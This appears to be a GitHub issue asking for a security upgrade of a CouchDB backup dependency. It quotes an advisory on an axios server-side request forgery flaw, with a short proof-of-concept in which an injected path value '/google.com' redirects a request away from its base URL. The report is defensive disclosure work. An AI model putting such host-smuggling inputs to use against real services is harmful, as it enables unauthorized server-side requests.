[BUG] Security upgrade @cloudant/couchbackup from 2.9.14 to 2.10.2 in - src/plugins/persistence/couch/package.json

[priyanshukumar397]

Server-side Request Forgery (SSRF)

Overview

axios is a promise-based HTTP client for the browser and Node.js.

Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) through unexpected behavior where requests for path-relative URLs get processed as protocol-relative URLs. An attacker can manipulate the server to make unauthorized requests by exploiting this behavior.

PoC

const axios = require('axios');

this.axios = axios.create({
  baseURL: 'https://userapi.example.com',
});

//userId = '12345';
userId = '/google.com'

this.axios.get(`/${userId}`).then(function (response) {
  console.log(`config.baseURL:  ${response.config.baseURL}`);
  console.log(`config.method:   ${response.config.method}`);
  console.log(`config.url:      ${response.config.url}`);
  console.log(`res.responseUrl: ${response.request.res.responseUrl}`);
});

Output:

config.baseURL:  https://userapi.example.com
config.method:   get
config.url:      //google.com
res.responseUrl: http://www.google.com/

[priyanshukumar397]

priyanshukumar397#2